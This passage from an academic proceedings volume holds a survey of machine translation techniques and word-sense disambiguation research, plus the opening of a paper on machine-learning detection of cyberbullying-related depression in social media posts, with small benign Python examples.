9. Anwar, A. (2020, November 06). Difference between AlexNet, VGGNet, ResNet and Inception.
Retrieved November 22, 2020 from https://towardsdatascience.com/the-w3h-of-alexnet-vgg
net-resnet-and-inception-7baaaecccc96.
10. Dwivedi, P. (2019, March 27). Understanding and coding a ResNet in Keras. Retrieved
November 05 2020. from https://towardsdatascience.com/understanding-and-coding-a-resnet-
in-keras-446d7ff84d33
11. Lazar, D. (March 06). Building a ResNet in Keras. Retrieved November 05, 2020. from https://
towardsdatascience.com/building-a-resnet-in-keras-e8f1322a49ba

12. Prabhu. (2018, March 15). CNN Architectures—LeNet, AlexNet, VGG, GoogLeNet and
ResNet. Retrieved November 05, 2020. from https://medium.com/@RaghavPrabhu/cnn-arc
hitectures-lenet-alexnet-vgg-googlenet-and-resnet-7c81c017b848
13. Li, F.-F., Johnson, J., & Yeung, S. (2017, May 02). CNN Architecture. Retrieved http://cs231n.
stanford.edu/slides/2017/cs231n_2017_lecture9.pdf
14. Brownlee, J. (2019). A gentle introduction to the rectified linear unit (relu). Machine learning
mastery. https://machinelearningmastery.com/rectified-linear-activation-function-fordeep-lea
rning-neuralordeep-learning-neural.
15. Sachan, A. (2019, September 17). Detailed guide to understand and implement ResNets.
Retrieved November 05, 2020 from https://cv-tricks.com/keras/understand-implement-resnets/
16. Perez, H., Tah, J. H., & Mosavi, A. (2019). Deep learning for detecting building defects using
convolutional neural networks. Sensors, 19(16), 3556.
17. Kong, Q., Allen, R. M., Kohler, M. D., Heaton, T. H., & Bunn, J. (2018). Structural health
monitoring of buildings using smartphone sensors. Seismological Research Letters, 89(2A),
594–602.
18. Zhu, J., Zhang, C., Qi, H., & Ziyue, Lu. (2019). Vision-based defects detection for bridges using
transfer learning and convolutional neural networks. Structure and Infrastructure Engineering,
16(7), 1037–1049.
19. Rosebrock, A. (2018, December 31). Keras Conv2D and convolutional layers. Retrieved
November 05, 2020. from https://www.pyimagesearch.com/2018/12/31/keras-conv2d-and-
convolutional-layers/
20. Zhong, B., Xing, X., Love, P., Wang, X., & Luo, H. (2019). Convolutional neural network: Deep
learning-based classification of building quality problems. Advanced Engineering Informatics,
40, 46–57.
Tools and Techniques for Machine
Translation

Archana Sachindeo Maurya, Srishti Garg, and Promila Bahadur

Abstract Machine translation has been a subject of exploration for many years. A great deal of notable work has been done in this field. Machine translation was the subject of serious speculation long before there were computers to apply to it. This paper aims to present different approaches, techniques, and algorithms used
for machine translation. Challenges of ambiguity in machine translation are also
discussed. The paper also outlines success reported in different categories by various
approaches taken along with challenges faced.

Keywords Machine translation · Natural language processing · Ambiguity ·


Statistical machine translation · Rule-based machine translation · Neural machine translation

1 Introduction

Language is a phenomenon and a factor that joins various societies, and a means of communicating the emotions and thoughts that individuals attempt to convey. Translation plays a critical role in moving cultural ideas between two or more languages. There are a few barriers or difficulties that translators face in this process. We realize that translation plays a significant role in removing the barriers created by different societies and in communication. Along these lines, translation is one of the basic keys and an adequate route for transferring culture. A good translator ought to simultaneously know about the cultural elements, perspectives, and conventions so as to intentionally think about the sequential order, expressed meaning, development of related constructs, and the historical and religious background of the source text.
Machine translation has been attempted in multiple ways by linguists. The approaches can be appreciated from various angles, like translation in terms of technology, approaches adopted, techniques used, and languages attempted, to name a

A. S. Maurya · S. Garg · P. Bahadur (B)


Institute of Technology, SRMU, Lucknow, India
e-mail: pbahadur.csed.cf@ietlucknow.ac.in


few. Further, the translated text can be judged on the basis of various parameters,
discussed as below.
a. Translation speed—This is determined by the response time of the translated
text.
b. Digital content—This is determined by the quality of translated audio and video
text across different devices.
c. Cross-platform—This is determined by the adoptability of translation tech-
nology among different platforms across different medias.
d. Translation quality—This is determined by the quality of translation and
accuracy.
e. MT approaches—This is determined by the efficiency of approaches that can
be applied for quality translations.
f. Cost—This is determined by the cost incurred for translation between source
and target language.
The paper outlines different translation approaches in Sect. 2. Section 3 is woven around different tools developed for machine translation. Section 4 discusses algo-
rithms used for machine translation. Section 5 addresses the ambiguity issues in
machine translation.

2 Machine Translation in Terms of Technology Used

Technology for machine translation can be categorized in terms of


a. Rule-based machine translation
b. Empirical machine translation.
Empirical is further categorized as example-based, statistical machine translation,
and neural machine translation as shown in Fig. 1.

2.1 Rule-Based Machine Translation

Rule-based translation primarily comprises a sentence analyzer, a parser, a bilingual dictionary, a rule base, and a parse tree. The approach has reported ninety percent accuracy [1], as shown in Fig. 2.
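To make the pipeline concrete, a toy dictionary-plus-reordering sketch in the rule-based spirit is given below; the tiny English-Hindi lexicon and the single SVO-to-SOV rule are invented for illustration and are far simpler than the rule bases used in real systems.

# Toy rule-based translation sketch: dictionary lookup plus one SVO -> SOV reordering rule (illustrative).
LEXICON = {'ram': 'raam', 'eats': 'khaata hai', 'an': 'ek', 'apple': 'seb'}  # invented mini-lexicon

def translate(sentence):
    words = sentence.lower().split()
    # Rule: in a simple SVO sentence, move the verb (second word here) to the end to get SOV order.
    if len(words) >= 3:
        words = [words[0]] + words[2:] + [words[1]]
    return ' '.join(LEXICON.get(w, w) for w in words)

print(translate("Ram eats an apple"))   # -> "raam ek seb khaata hai"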

Fig. 1 Categories of machine translation

Fig. 2 Rule-based machine translation process



Fig. 3 Statistical machine translation process

2.2 Statistical Machine Translation

Statistical machine translation (SMT) quality can be evaluated by the size of the training corpora and the resources used, such as linguistic tools, dictionaries, etc. The quality of translation also depends on the language pair used. SMT comprises major parts like the dictionary, training sets, decoding, and testing, as shown in Fig. 3. The process has reported eighty-seven percent accuracy [2]. The open-source software Moses allows automatically training a translation model for any language pair and requires a collection of translated text to do so.
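The decision rule underlying phrase-based SMT systems such as Moses is the standard noisy-channel formulation: for a source sentence f, the decoder searches for the target sentence e that maximizes

ê = argmax_e P(e | f) = argmax_e P(f | e) · P(e)

where P(f | e) is the translation model learned from the parallel corpus and P(e) is the target language model; this is background context rather than a detail reported in the surveyed papers.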

2.3 Neural Machine Translation

In neural machine translation, the source text is encoded into a set of specific features by one neural network, and another neural network decodes it. Each word depends on the surrounding words, and recurrent neural networks are used to handle them, as shown in Fig. 4; the network remembers previous words. Neural machine translation has shown remarkable success in terms of fewer word order mistakes [3–5] and fewer lexical and grammar mistakes. Further, open-source ecosystems for neural machine translation provide implementations on deep learning frameworks [3, 4].

Fig. 4 Neural machine translation process
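A minimal Keras sketch of such an encoder–decoder recurrent model is given below; the vocabulary sizes and dimensions are illustrative assumptions, and production NMT systems add attention, subword units, and beam search on top of this skeleton.

# Minimal encoder-decoder (seq2seq) sketch of the NMT idea described above (illustrative).
from tensorflow.keras import layers, models

SRC_VOCAB, TGT_VOCAB, EMB, HID = 8000, 8000, 256, 512   # assumed sizes

# Encoder: reads the source sentence and summarizes it in its final LSTM states.
enc_inputs = layers.Input(shape=(None,))
enc_emb = layers.Embedding(SRC_VOCAB, EMB)(enc_inputs)
_, state_h, state_c = layers.LSTM(HID, return_state=True)(enc_emb)

# Decoder: generates the target sentence word by word, conditioned on the encoder states.
dec_inputs = layers.Input(shape=(None,))
dec_emb = layers.Embedding(TGT_VOCAB, EMB)(dec_inputs)
dec_out, _, _ = layers.LSTM(HID, return_sequences=True, return_state=True)(
    dec_emb, initial_state=[state_h, state_c])
dec_probs = layers.Dense(TGT_VOCAB, activation='softmax')(dec_out)

model = models.Model([enc_inputs, dec_inputs], dec_probs)
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy')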

3 Machine Translation in Terms of Techniques Used

Phrase dependency tree bank (PDT) [6] has flat structures, and dependency is based on semantics rather than syntactic functions, which makes it different from binary branching. Binary branching follows mainstream dependency analysis.
An automatic post-editing tool [7] is proposed for the automatic proposition of word replacements for a machine translation output. This approach uses a technique based on bilingual word embeddings. Further, the effectiveness of the tool is shown in terms of two lexical errors: 'not translated word' and 'incorrectly translated word.'
A partial dependency parser for the Irish language is proposed, which uses Constraint Grammar (CG) rules. The CG rules are used to annotate dependency relations and grammatical functions in unrestricted Irish text. Chunking is performed using a regular-expression grammar which operates on the dependency-tagged sentences. The parser has reported an F-score of ninety-three percent on development data and ninety-four percent on unseen test data, while the chunker achieves an F-score of ninety-seven percent on development data and ninety-three percent on unseen test data [8].
A system for converting Sanskrit text to Universal Networking Language expressions, named 'SANSUNL', is proposed in [9]. POS tagging, Sanskrit language processing, and parsing were enhanced. Further, a Sanskrit stemmer with 23 prefixes, 774 suffixes, and grammar rules is used for stemming the Sanskrit sentences in the proposed system. An efficiency of ninety-five percent, evaluated on BLEU and fluency score metrics, was reported [9].

A virtual translation tool for generating text or voice in other languages is


presented. The system is expected to assist audiences in live presentations for under-
standing foreign language content. In this approach, the conventional translator was replaced by neural machine translation. Further, human–machine interaction was improved by using text-to-speech and speech recognition. The Vietnamese-English language pair showed the effectiveness of the proposed system design and deployment approach [1].
The proposed system used the Dynamic Quality Framework (DQF) platform with ten professional translators, starting with raw machine translation segments of two texts—an instruction manual and a marketing text—produced by the Microsoft Translation engine (TAE) and Google Neural Machine Translation (TAN). Further, the results showed the productivity of the neural engine, as post-editing of its proposals took less time [10].
The tool ‘Hinglish’ for translation between Pure Hindi and English is reported to
be capable of translating in three ways, i.e., Hinglish into pure Hindi and English,
pure Hindi into pure English, and vice versa. The techniques used are (1) direct
MT approach, (2) rule-based MT approach, and (3) hybrid MT approach in word
ordering. Further, the tool has reported an accuracy of 91% for providing output in Hindi sentences and of 84% for providing output in English sentences when the input sentences were in Hinglish [11].
The paper proposes a paragraph-parallel corpus based on English and Chinese versions of novels and then designs a hierarchical attention model. The encoder and decoder take segmented clauses as input to process words, clauses, and paragraphs at different levels, particularly with a two-layer transformer to capture the context from both source and target languages. The output of the model based on the original transformer is used as another level of abstraction, conditioning on its own previous hidden states [12].
This paper proposes an analysis of adjectival constructions in HPSG, focussing on
the behavior of adjectives in NP, and develops an account of the familiar observation
that adjectives without complements typically precede the noun, while those with
complements or post-modifiers typically follow the noun [13].
The paper shows empirically that the back-translation system matters for synthetic corpus creation and that neural machine translation performance can be improved by iterative back-translation in both high-resource and low-resource scenarios [14].
This paper presents multilingual machine translation between different languages by introducing an artificial token at the beginning of the input sentence to specify the required target language in a standard neural machine translation system. Further, the authors have claimed to merge twelve language pairs and reported reasonable success [34].
Open Source toolkit for neural machine translation (NMT) provides efficiency,
modularity, and extensibility in order to support NMT research into model archi-
tectures, feature representations, and source modalities. Toolkit further maintains
competitive performance and reasonable training requirements. The toolkit consists
of modeling and translation support, as well as detailed pedagogical documentation
about the underlying techniques [35].

4 Machine Translation in Terms of Algorithms Used

Machine translation has also been attempted in terms of the algorithms used and has reported a significant amount of success in the quality of translation, as discussed below.
a. Error Analysis of SaHiT—a statistical Sanskrit-Hindi translator—is proposed, which analyzes errors of a Sanskrit-to-Hindi MT system that uses a statistical approach. The corpus was built and trained using the MTHub platform. An error report was generated by the MTHub system, and over two phases of training a BLEU score of forty-one percent was reported [15].
b. A machine translation system for the translation of English to the Sanskrit language, 'EtranS', is proposed to improve the quality of translation. Two modules were developed: (a) the parser module, responsible for parsing, i.e., after analysis, tokens are generated and grammatical and syntax analysis is done; and (b) the generator module, which uses semantic information for mapping, with results generated on the basis of the mapping. The system reported an accuracy of ninety percent for small, large, and extra-large sentences [1]. The system considers simple and compound sentences.
Machine translation from English to the Sanskrit language is also proposed in [16]. Here, four modules are developed: lexical parser, semantic mapper, translator, and composer. The lexical parser provides POS tag information. Three different rules are generated, namely the equality rule, synonym rule, and antonym rule. After parsing, when tokens are generated and a dependency relation between tokens is found, a tree is generated and mapping is done between the English and Sanskrit sentences [16].
Morphological analysis along with lexical analysis is reported in [17]. A rule format is designed, and the root word and its meaning are identified with the help of a lexical analyzer [17].
A parsing technique based on lexical functional grammar (LFG) for Sanskrit text is reported in [18]. LFG works on two basic types of syntactic representation: (a) constituent structure and (b) functional structure. The LFG approach is used to bridge the gap between Sanskrit and English, as the representations of the two languages are different; for instance, English is subject-verb-object (SVO), whereas Sanskrit is subject-object-verb (SOV). The objective is to develop a parsing technique. The system considers simple sentences [18].

5 Addressing Ambiguity in Machine Translation

Addressing ambiguity is a major challenge in the field of machine translation. The


same has been addressed by many researchers. Ambiguity is addressed in many
languages and has attained a relative amount of success, reported as follows. Chal-
lenges in machine translation in terms of multiple meanings are reported. Further,

the possibility of multiple sentence structures is also outlined. Ambiguity is further


classified as word-sense ambiguity, reference ambiguity, and structural ambiguity
[19, 20].
A new system designed on a supervised learning approach is reported in [21]. Classification is based on the Naïve Bayes machine learning process. Five different features were extracted: unigram co-occurrence, POS of the target word, POS of the next word, local collocation, and semantically related words. Further, a new semantic feature, semantically related words, is added to their previous Naïve Bayes classification process. An accuracy of ninety-one percent is reported [21].
Bag of words (BoW) and collocation models are applied with Naïve Bayes for the disambiguation process. The system has reported an enhancement in accuracy as the number of senses decreases in both the BoW and collocation models. Further, it determines that the BoW model gives higher accuracy than the collocation model [22]. An unsupervised graph-based approach is used for processing sentences. The approach finds the ambiguous words and creates a virtual graph over the vectors. The similarity between labeled nodes of the graph can be calculated, which further forms the basis of the similarity-value sense label. This is a novel approach for Indian languages. Further, higher accuracy and adaptability are reported. The approach can also be applied in an unsupervised graph-based method [23]. A knowledge-based Lesk algorithm is used in the system, and the semantic similarity of the target word can be determined over the collection of word sets. A large WordNet for Kannada is developed to store all types of words. The method reported results to be more accurate and efficient [24].
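As an illustration of the knowledge-based idea, a simplified Lesk-style overlap computation is sketched below; the toy glosses are invented for illustration, and a real system would draw senses and glosses from a resource such as the Kannada WordNet mentioned above.

# Simplified Lesk-style WSD: choose the sense whose gloss overlaps most with the context (toy example).
def simplified_lesk(context_words, sense_glosses):
    best_sense, best_overlap = None, -1
    context = set(w.lower() for w in context_words)
    for sense, gloss in sense_glosses.items():
        overlap = len(context & set(gloss.lower().split()))
        if overlap > best_overlap:
            best_sense, best_overlap = sense, overlap
    return best_sense

# Invented glosses for the ambiguous English word "bank" (for illustration only).
glosses = {
    'bank_financial': 'an institution that accepts deposits and lends money',
    'bank_river': 'the sloping land beside a body of water or river',
}
print(simplified_lesk('he sat on the bank of the river'.split(), glosses))  # -> bank_river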
Genetic algorithm is used for the disambiguation of Gujarati WordNet. This algo-
rithm is started with a set of solutions that is represented by chromosomes, called
population. According to this algorithm, solution from one population is taken and
it is used to form a new population. This algorithm can be developed to implement
other genetic algorithm components and different methods can be investigated to
implement the GA components. The components are initialization of the popula-
tion, parent selection, and survivor selection. The approach can also be used for
Indo-Aryan languages [25]. Unsupervised context similarity method develops sense
clusters using the seed sets. On the basis of similarity between the input text and
sense clusters, most similar sense is selected. Further, the accuracy of seventy-two
percent is reported [26]. Naïve Bayes probabilistic model using lemmatized system
is reported to perform better due to greater lexical coverage. The results obtained
were reported to be satisfactory. It is also ascertained that a stronger and properly organized training set will give better results [27].
Support vector machine (SVM) for the disambiguation process for regression and
multiclass classification is used. This approach depends on POS tags and lemmatized
sense annotated corpus. It relies on the nearby words of the target word. Further, it is
reported that POS tags and lemma of surrounding words and morphological features
of the target word are the useful features for the better performance in disambigua-
tion process [28]. Decision list algorithm utilized training corpus to disambiguate all
the content words in the testing set that are used. One sense per collocation prop-
erty is used to disambiguate all ambiguous words. The corpus is divided into two
sets: training set and testing set. The decision list is constructed using the training

set data. Further, list is used for testing set data for disambiguation of ambiguous
words. Performance of the system is reported to be encouraging [29]. Hybrid training
method is used for better performance over supervised and unsupervised approach.
The algorithm further reported that unsupervised method gives sixty-three percent,
supervised method gives seventy-six percent, and hybrid method gives eighty percent
of accuracy. Therefore, it is concluded that accuracy is improved in hybrid approach
[30].
A Naïve Bayesian method with a supervised learning approach and rich features is reported. Here, a forward sequential selection algorithm is used to choose the best set of features. High accuracy is reported by using this method [31]. A novel context clustering algorithm is presented in the Bayesian framework. This algorithm is based on the similarities between context pairs. After that, a maximum entropy model is trained to represent the probability distribution of context pair similarities based on heterogeneous features; the approach has reported significantly high performance among unsupervised approaches, challenging the supervised WSD systems [32, 33].

6 Conclusion

Machine translation mechanism construction, by different approaches, has its own


advantages and disadvantages. The different ideas for machine translation, inclusive of techniques and technology used, along with the challenges, have been addressed. Ambiguity is a major factor addressed by researchers; it plays a pivotal role in the success of a translation system. Developing approaches to remove ambiguity and provide unambiguous translation is a major task.
Encouraging results are reported by researchers in achieving a high order of error-free and non-ambiguous translation. All things considered, accomplishing hundred percent error-free translation remains an inaccessible objective, as computers are still not sensitive enough to catch the state of mind of the speaker, and the goal is to accomplish close-to-perfect translation in an optimized time frame.

Acknowledgements The authors would like to thank Council of Science & Technology, UP for
providing fund under Adhoc-Research Scheme/Transfer of Technology Scheme with the reference
no-CST/D 2475.

References

1. Bahadur, P., Jain, A. K., & Chauhan, D. S. (2012). “EtranS-A complete framework for english to
sanskrit machine translation. International Journal of Advanced Computer Science and Appli-
cations(IJACSA), Special Issue on Selected Papers from International Conference & Workshop
On Emerging Trends In Technology. https://doi.org/10.14569/SpecialIssue.2012.020107

2. Sreelekha, S., Bhattacharyya, P., & Malathi, D. (2018, January). Statistical versus rule-based
machine translation: A comparative study on Indian languages. In International Conference
on Intelligent Computing and Applications.
3. Ott, M., Edunov, S., Grangier, D., & Auli, M. (2018). Scaling neural machine translation.
arXiv:1806.00187v3 [cs.CL] 4 Sep 2018
4. Hoang, C. D. V., Koehn, P., Haffari, G., & Cohn, T. (2018). Iterative back-translation for neural
machine translation. In Proceedings of the 2nd Workshop on Neural Machine Translation and
Generation, Melbourne, Australia, July 20 (pp. 18–24). c 2018 Association for Computational
Linguistics.
5. Johnson, M., Schuster, M., Le, Q. V., Krikun, M., Wu, Y., Chen, Z., Thorat, N., Viégas, F.,
Wattenberg, M., Corrado, G., Hughes, M., & Dean, J. (2017) Google’s multilingual neural
machine translation system: Enabling zero-shot translation.
6. Cao, J.-X., Huang, D.-G., Wang, W., & Wang, S.-J. (2014). Dalian Ligong Daxue
Xuebao/Journal of Dalian University of Technology, 54(1), 91–99.
7. Inácio, M. L., & Caseli, H. (2020). Word embeddings at post-editing february 2020 compu-
tational processing of the Portuguese Language. In 14th International Conference, PROPOR
2020, Evora, Portugal, March 2–4, Proceedings.
8. Dhonnchadha, E. U., & Genabith, J. V. (2010). Partial dependency parsing for Irish centre
for language and communication studies. Trinity College, Dublin, Ireland. Centre for Next
Generation Localisation, Dublin City University, Glasnevin, Dublin
9. Sitender & Bawa, S. (2020). Sanskrit to universal networking language EnConverter system
based on deep learning and context-free grammar. Multimedia Systems Metrics.
10. López-Pereira, A. (2019, December). Neural machine translation and statistical machine
translation: Perception and productivity, Revista Tradumàtica.
11. Attri, S. H., Prasad, T. V., & Ramakrishna, G. (2020). Computer Science, 21(3). https://doi.org/
10.7494/csci.2020.21.3.3624 HiPHET: Hybrid approach for translating mixed code language
(Hinglish) to pure languages (Hindi and English).
12. Zhang, Y., & Liu, G. (2020). Paragraph-parallel based neural machine translation model with hierarchical attention. Journal of Physics: Conference Series, 1453, 012006.
13. Sadler, D. A. L. (1992). Noun-modifying adjectives in HPSG. Department of Language and Linguistics, University of Essex, Wivenhoe Park, Colchester, CO4 3SQ, UK.
14. Klein, G., Kim, Y., Deng, Y., & Senellart, Rush, A. M. (2017). OpenNMT: open-source toolkit
for neural machine translation. arXiv: 1701.02810v2 [cs.CL] 6 Mar 2017
15. Pandey & Jha (2016). Error Analysis of SaHiT—A Statistical Sanskrit-Hindi Translator.
16. Barkade et al .(2010). English to Sanskrit Machine Translation Semantic Mapper.
17. Tapaswi & Jain .(2011). Morphological and lexical analysis of the Sanskrit sentences.
18. Tapaswi et al .(2012). Parsing Sanskrit sentences using lexical functional grammar.
19. Sekharaiah, K. C., Gopal, U., & Khan, M. A. M. (2006) Obstacles to machine translation
20. Tapaswi et al. (2011): Morphological and lexical analysis of the Sanskrit sentences
21. Borah, P. P., Talukdar, G., & Baruah, A. (2019). WSD for Assamese Language.
22. Singh, V. P., & Kumar, P. (2018). Naive Bayes classifier for word sense disambiguation of
Punjabi language.
23. Sheth, M., Popat, S., & Vyas, T. (2018). Word sense disambiguation for Indian Languages
24. Shashank, N. S., Kallimani, J. S. (2017). Word sense disambiguation of polysemy words in
Kannada language.
25. Zankhana, B., & Vaishnav (2017). Gujarati word sense disambiguation using genetic algorithm.
26. Sruthi Sankar, K. P., Raghu Raj, P. C., & Jayan, V. (2016). Unsupervised approach to word
sense disambiguation in Malayalam.
27. Pal, A. R., Saha, D., Naskar, S., & Sekhar, N. (2015). Dash, word sense disambiguation in
Bengali: A lemmatized system increases the accuracy of the result.

28. Anand Kumar, M., Rajendran, S., & Soman, K. P. (2014). Tamil word sense disambiguation
using support vector machines with rich features.
29. Parameswarappa, S., & Narayan, V. N. (2013). Kannada word sense disambiguation using
decision list.
30. Saktel, P., & Shrawankar, U. (2012). An improved approach for word ambiguity removal.
31. Le, C. A., & Shimazu, A. (2004). High WSD accuracy using Naive Bayesian classifier with
rich features.
32. Niu, C., Li, W., Srihari, R. K., Li, H., & Crist, L. (2004). Context clustering for word sense
disambiguation based on modeling pairwise context similarities.
33. Le, N.-B., Dao, X.-Q., & Nguyen Thi, M.-T. (2021). In Design of Text and Voice Machine
Translation Tool for Presentations April 2021 Conference: 13th Asian Conference on Intelligent
Information and Database Systems. Phuket Thailand.
Cyberbullying-Mediated Depression
Detection in Social Media Using Machine
Learning

Akshi Kumar and Nitin Sachdeva

Abstract Mental distress is one of the most paramount causes of disability world-
wide. People using social media at an exponential rate become prey to cyberbullying victimization, eventually leading to mental health problems. This study focused on
assessing the association of social media, cyberbullying, and mental depression via
the use of supervised learning techniques. In this work, learning techniques namely
support vector machines, random forests, Naïve Bayes, multilayer perceptron, convolutional neural network, and recurrent neural network have been applied on the data
(taken from Twitter and Reddit) for predicting cyberbullying-mediated depression
detection. Higher accuracy is observed with deep learning as compared to baseline
machine learning. Also, among the applied classical machine learning techniques,
random forests reported the highest accuracy.

Keywords Cyberbullying · Mental health · Depression · Social media

1 Introduction

Mental distress is a nervous disorder in which the suffering individual experiences


certain issues in their behavior, thinking, and the way he or she feels. It affects the individual's life in a way where their actions seem to be quite confusing or out of order, owing to which the person finds himself or herself troubled. Symptoms such as confused emotions, insomnia, depression, eating disorders, anxiety, or rage are often exhibited by a mentally distressed person. It has been observed that depression
and anxiety have become the most usual mental disorder among the masses. Every
other person is vulnerable to either anxiety/depression. According to Diagnostic and
Statistical Manual of Mental Disorders [1], there are over three hundred types of mental disorders, of which depression is the most rampant. A depressed individual is
often found being sad, discouraged, scared, and lonely. This omnipresent disorder
may be due to bad things that happened to them in their lives in the past such

A. Kumar (B) · N. Sachdeva


Department of Computer Science and Engineering, Delhi Technological University, Delhi, India
e-mail: akshikumar@dce.ac.in


as losing a job, lack of friends, strict parents, online trolling, cyberbullying (CB),
or any other related issues. Even so, with the technological advancements, people
are spending more time on social media rather than spending quality time with
their friends/family members. People suffering from mental distress [2] and other
depressive disorders generally use social media (SM) (such as Twitter, Reddit, and
Facebook) to share personal experiences, vent out their feelings and hear from other
people who are having similar issues. It is mainly related to emotional stress, social anxiety, depressive symptoms, suicidal ideation, suicidal attempts, etc. CB [3–5] is a rising public health concern that has been associated with multiple serious negative
consequences including depression, anxiety, insomnia, etc. Observing mental distress
on SM could have a serious impact on public health issues but when combined with
CB victimization, the impact could be exacerbated. Motivated by this, in our paper,
we focused on observing signs of depression on SM (namely Twitter and Reddit)
using supervised learning techniques like support vector machines (SVM), Naïve
Bayesian (NB), random forests (RF), multilayer perceptron (MLP), recurrent neural
network (RNN), and convolutional neural network (CNN). Term frequency–inverse
document frequency (TF-IDF) and Word2Vec were used for feature selection for ML
techniques, whereas word embedding [4] has been used for word feature vectorization
for DL techniques. Hence, we felt a binary classification (CB-mediated depression versus non-CB-mediated depression) can be effectively conducted via analyzing the texts written on SM (real-time user-generated data) by people at risk of or suffering from mental illnesses (particularly depression due to CB).
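A minimal scikit-learn sketch of the classical ML side of this setup (TF-IDF features feeding the baseline classifiers) is shown below; the toy posts and labels are placeholders invented for illustration and are not samples from our dataset.

# Sketch: TF-IDF features with baseline classifiers (NB, SVM, RF); the data shown is placeholder text.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.svm import LinearSVC
from sklearn.ensemble import RandomForestClassifier
from sklearn.pipeline import make_pipeline
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score

posts = ["they keep mocking me online and i feel worthless",
         "feeling low today for no particular reason",
         "constant insults on my posts are making me depressed",
         "could not sleep well, exams are stressing me out"]
labels = [1, 0, 1, 0]   # 1 = CB-mediated depression (CBMD), 0 = non-CB-mediated (N-CBMD)

X_train, X_test, y_train, y_test = train_test_split(posts, labels, test_size=0.5,
                                                    random_state=0, stratify=labels)
for clf in (MultinomialNB(), LinearSVC(), RandomForestClassifier()):
    pipe = make_pipeline(TfidfVectorizer(stop_words='english'), clf)
    pipe.fit(X_train, y_train)
    print(type(clf).__name__, accuracy_score(y_test, pipe.predict(X_test)))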
Thus, the main contributions of this research are given below:
• Implement supervised ML and DL techniques for comparative analysis of CB-
mediated depression and non-CB-mediated depression detection (NB, SVM,
MLP, RF using TF-IDF, Word2Vec & CNN, RNN, Conv-RNN using GloVe) using
accuracy, precision, and recall on the data obtained from SM namely Twitter and
Reddit.
The rest of the paper is organized as follows. Second section discusses in brief
about the related work followed by discussion on the application of supervised
learning for CB detetction, results discussion, finally followed by conclusion and
future work discussion in the last sections.

2 Background and Related Work

This section briefly reviews studies related to mental distress owing to CB victimization on SM. Cénat et al. [6] studied CB and its serious consequences for teenagers (depression, anxiety, suicide, loneliness); logistic regression was used to predict mental distress, low self-esteem, etc., from CB victimization, and the results showed that girls had a higher prevalence of CB victimization. Nandhini et al. [7] proposed a CB detection system that identified and classified flaming, harassment, etc., using the Levenshtein algorithm and NB; enhanced results were obtained for CB detection and classification using an information retrieval algorithm. Nandhini et al. [8] proposed a system with enhanced accuracy to classify harassment, racism, flaming, and terrorism using fuzzy logic and genetic algorithms on data taken from Myspace and Formspring.com. Frommholz et al. [9] proposed a framework for the identification of cyberstalking and harassment using ML techniques, with good results. Radovic et al. [10] examined adolescents' use of SM in relation to depression caused by CB and related factors, via interviews and content analysis. Torous et al. [11] conducted a review to assess current suicide-prevention approaches based on smartphones, sensors, and ML techniques. Viner et al. [2] studied the association between SM use and mental distress and related consequences (CB, etc.) among young people in England through questionnaire-based content analysis. Talpur et al. [12] proposed a framework with improved accuracy for CB detection using PMI and ML techniques, namely NB, kNN, SVM, RF, etc.

3 Supervised Learning for Observing Signs of Mental Distress Due to Cyberbullying

This section discusses the dataset used and the system architecture.

3.1 Dataset Discussion

Our study addresses topics related to depression owing to CB. Several established depression datasets are available online, but they cover posts in which depression and mental distress arise from a range of causes such as job loss, family issues, financial problems, and birth defects. We therefore synthesized our own dataset focused primarily on mental depression caused by CB. Data were collected from Twitter and Reddit using the keywords 'depression' and 'mental distress.' Around 20,000 samples were gathered and then preprocessed. Preprocessing removed NaN values, blank lines, punctuation, numbers, extra spaces, and stop words, and stemming was applied, leaving 19,731 samples. The samples were then manually annotated to identify CB-indicative symptoms and classified into two classes: CB-mediated depression (CBMD) and non-CB-mediated depression (N-CBMD). From the collected dataset, we observed that approximately 18% of the samples contained CB-mediated depression, which made our corpus skewed (imbalanced): CBMD contained 3551 samples and N-CBMD contained 16,180 samples. The former is the minority class (fewer samples), whereas the latter is the majority class (more samples). One way of solving the imbalanced-class problem is to change the

Fig. 1 Word cloud built from the data collected from SM

class distributions in the training data by over-sampling the minority class or under-
sampling the majority class. So, in order to handle the data skewness, we incorporate
the use of ‘RandomOverSampler (ROS).’
Figure 1 shows the word cloud built from the collected data.
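As a rough illustration of this balancing step, the following sketch shows how minority-class over-sampling can be applied with the imbalanced-learn library; the placeholder texts, labels, and random seed are illustrative assumptions, not values from our corpus.

# Hedged sketch: over-sampling the minority CBMD class with imbalanced-learn (ROS).
# `texts` and `labels` are placeholders standing in for the annotated corpus.
from collections import Counter
from sklearn.feature_extraction.text import TfidfVectorizer
from imblearn.over_sampling import RandomOverSampler

texts = ["sample post one", "sample post two", "sample post three"]  # placeholder documents
labels = [1, 0, 0]                                                   # 1 = CBMD, 0 = N-CBMD

X = TfidfVectorizer().fit_transform(texts)        # sparse TF-IDF features
ros = RandomOverSampler(random_state=42)          # randomly duplicate minority samples
X_res, y_res = ros.fit_resample(X, labels)

print(Counter(labels), "->", Counter(y_res))      # class counts before and after ROS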

3.2 System Architecture

The system architecture is shown in Fig. 2. The first phase was data collection and preprocessing. Next, feature extraction was carried out using TF-IDF [3, 5] and Word2Vec [13] to create word feature vectors, which were fed to the supervised machine learning techniques [14, 15] (SVM, NB, RF, MLP), while GloVe embeddings [4] were used for the RNN and CNN [4, 16–20] classifiers. Here, 80% of the data was used for training and the remaining 20% for testing.
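A minimal sketch of the TF-IDF plus classical ML branch of this pipeline is given below, assuming a scikit-learn workflow; the 80/20 split and the four classifiers match the description above, while the placeholder corpus and default hyperparameters are assumptions made only for illustration.

# Hedged sketch of the TF-IDF + ML branch of the architecture.
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.naive_bayes import MultinomialNB
from sklearn.neural_network import MLPClassifier
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score, precision_score, recall_score

texts = ["post one", "post two", "post three", "post four"]   # placeholder corpus
labels = [1, 0, 1, 0]                                          # 1 = CBMD, 0 = N-CBMD

X = TfidfVectorizer().fit_transform(texts)
X_tr, X_te, y_tr, y_te = train_test_split(X, labels, test_size=0.2, random_state=0)

models = {"RF": RandomForestClassifier(), "NB": MultinomialNB(),
          "MLP": MLPClassifier(max_iter=500), "SVM": SVC()}
for name, model in models.items():
    y_pred = model.fit(X_tr, y_tr).predict(X_te)
    print(name, accuracy_score(y_te, y_pred),
          precision_score(y_te, y_pred, zero_division=0),
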